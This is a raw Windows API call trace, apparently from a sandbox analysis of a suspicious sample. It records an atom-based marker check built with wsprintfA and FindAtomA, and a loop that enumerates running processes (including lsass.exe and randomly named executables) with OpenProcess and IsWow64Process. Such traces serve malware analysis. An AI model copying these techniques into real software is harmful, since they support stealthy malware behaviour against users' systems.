	[0072.112] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.112] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.112] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.113] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetLastError () returned 0x5
	[0072.114] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.115] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.115] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.115] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.115] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.115] CloseHandle (hObject=0x224) returned 1
	[0072.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.115] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.115] CloseHandle (hObject=0x224) returned 1
	[0072.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eb08, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.115] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.115] CloseHandle (hObject=0x224) returned 1
	[0072.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16c78) returned 0xc0000004
	[0072.148] VirtualAlloc (lpAddress=0x0, dwSize=0x16d78, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16d78, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0072.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.152] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.152] CloseHandle (hObject=0x224) returned 1
	[0072.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.152] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.152] CloseHandle (hObject=0x224) returned 1
	[0072.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7289b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.152] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.152] CloseHandle (hObject=0x224) returned 1
	[0072.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.153] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.153] CloseHandle (hObject=0x224) returned 1
	[0072.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.153] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.153] CloseHandle (hObject=0x224) returned 1
	[0072.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.153] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.153] CloseHandle (hObject=0x224) returned 1
	[0072.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7288f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.153] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.153] CloseHandle (hObject=0x224) returned 1
	[0072.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.153] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.153] CloseHandle (hObject=0x224) returned 1
	[0072.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.154] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.154] CloseHandle (hObject=0x224) returned 1
	[0072.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.154] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.154] CloseHandle (hObject=0x224) returned 1
	[0072.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.154] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.154] CloseHandle (hObject=0x224) returned 1
	[0072.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.154] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.154] CloseHandle (hObject=0x224) returned 1
	[0072.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7289b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.155] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.155] CloseHandle (hObject=0x224) returned 1
	[0072.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.155] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.155] CloseHandle (hObject=0x224) returned 1
	[0072.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.155] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.155] CloseHandle (hObject=0x224) returned 1
	[0072.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.155] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.155] CloseHandle (hObject=0x224) returned 1
	[0072.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7289f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.155] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.156] CloseHandle (hObject=0x224) returned 1
	[0072.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.156] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.156] CloseHandle (hObject=0x224) returned 1
	[0072.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.156] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.156] CloseHandle (hObject=0x224) returned 1
	[0072.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
